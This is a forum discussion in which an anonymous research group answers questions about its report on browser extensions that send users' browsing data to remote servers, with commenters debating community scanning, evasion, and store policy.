Thank you. We are very glad to see the discussion that the report has sparked and and also glad to see the feedback on it. It means a lot to us.
> 1- how large your team is? and how long this research took? it is very thorough and knowing such a detail might encourage others to participate in a joint effort in performing this kind of research
The group is not very large and it took a few months of non-continuous work.
> 2- if this kind of research is your primary focus?
At the moment it is not very clear if we will do followup on this topic or not as explained in different comment. At the moment yes, the group is new.
> 3- if there are other ways that financial support can be provided other than through xrp or btc?
No, at the moment. We would like to remain anonymous, at least for now.
My point was to have a community effort around it as well if possible and people could say, upload suspicion and people could then confirm it?
I am curious but wouldn't this effort be more better if more people outside who are interested in investing their own resources for the safety of a better internet could help you out in such endeavour? So essentially they can also help you out in such task essentially creating an open source-ish committee/list which can decide it.
I do feel like if resources are something in short, then actually doing such would be even more beneficial, right? What are your thoughts on it?
(Tangent if you actually do this:
This might become a cat and mouse game if the person with malicious extension say reads the github repo and if they see their extension in it before people can conclude its malicious, making the cat and mouse game but I am imagining a github action which can calculate the hash and download link and everything (essentially archiving) a state of extension and then people can get freed from the game and everything as well. So this might help a lot in future if you actually implement it)
It is a noble idea to have a community driven effort in security research. We are sceptical that would work. The same way security researchers will read this thread in future bad actors (e.g. Similarweb) can read as well.
Any tool that would be open sourced or community driven for extension scanning will be with enough time used by bad actors to evade the scans. That is also why we don't share the code for this research as it would only speed up this process.
Oh I understand. I don't have any expertise in such field but reading this, I can understand why open source approach might not work out which is a little sad being honest.
But I feel like then the (bottleneck?) [which I don't mean in a bad way] would be the team where the attackers might still be infinitely more which can exhaust your resources which you mention as such.
Also,Are there any other teams working in this? Thoughts on collaborating with anyone in the security field?
Maybe if a direct detailed discussion can't happen then just as how you released the list of these extensions, you can release extensions in future too as you detect them
Do you feel as if LLM generated vibe-coded (with some basic reading of code to just get idea and see if there's any bad issues) would be more safer than a random extension in firefox/chrome in general? Given one is a black box (closed source) generated by human and the other is an open code generated by a black box.
15 years ago was probably this type of business in its very early stage. There is little that can be done about "selling" extensions. Chrome Web Store should have tighter checks and scans to minimize this type of data exfiltration.
It's a moronic industry, waiting for the catastrophic data-theft disaster to happen before they do anything... Google is doing it, Apple did it, Zuck did it (the only hindrance Cambridge Analytica had to go over seemed to be the apps developer agreement that devs had to click to promise you won't do anything bad with the personal information of all those Facebook users...).
Which is all the more incredible, considering Blackberry (the phone company that was big before the age of iPhones or YouTube) had a permission model that allowed users to deny 3rd-party apps access to contacts, calendar, etc, etc. The app would get a PermissionDeniedException if it can't access something. I remember the Google Maps app for Blackberry, which solution to that was "Please give this app all permissions or you can't use it"...
We beg to differ. Consider for example "BlockSite Block Websites and Stay Focused" why would you need to send browsing data to remote server if your job is only to block selected domains?
If you look at the request made, then it seems to check the category of the site, for whatever reason. I don't know that extensions, so I don't know if this is a legit use, sloppy use or harmful. I'm also not saying they found nothing at all. But looking through what they found, they seem to have not even thought much about whether those cases are legit and in the excepted and necessary realm of actions the add-on is supposed to do, or if it's really harmful behaviour. I also don't see anything about how often the request was made. Was it on every url-change, or just once/occasionally?
This whole article is a bit too superficial for me.
Yes, obviously is that possible, but the least that one should do then is looking up what's really happening. These are browser addons, the source code is available. But instead they are looking from the outside and calling alarm on something they don't understand. That's just poor behaviour and harmful in today's climate.
If you read their full paper, they do technical analysis confirming findings in many cases. Many other researchers have done the same in the recent past.
Full paper also says that the unique URLs were later requested by crawlers, which confirms server-side collection.
What happens server-side is also confirmed by the palant.info article that shows a graphic provided by a major data broker that shows exactly how they mis-use data collected by extensions under false pretenses.
It's far from speculation when there's both technical evidence collected by researchers and direct evidence provided by the bad actors themselves.
Without any doubt the research could continue on this. We had many opportunities to make the scan even wider and almost certainly we would uncover more extensions. The number of leaking extensions should not be taken as definite.
There are resource constrains. Those extensions try to actively detect if you are in developer mode. Took us a while to avoid such measures and we are certain we missed many extensions due to for example usage of Docker container. Ideally you want to use env as close to the real one as possible.
Without infrastructure this doesn't scale.
The same goes for the code analysis you have proposed. There are already tools that do that (see Secure Annex). Often the extensions download remote code that is responsible for data exfiltration or the code is obfuscated multiple times. Ideally you want to run the extension in browser and inspect its code during execution.
> 1- how large your team is? and how long this research took? it is very thorough and knowing such a detail might encourage others to participate in a joint effort in performing this kind of research
The group is not very large and it took a few months of non-continuous work.
> 2- if this kind of research is your primary focus?
At the moment it is not very clear if we will do followup on this topic or not as explained in different comment. At the moment yes, the group is new.
> 3- if there are other ways that financial support can be provided other than through xrp or btc?
No, at the moment. We would like to remain anonymous, at least for now.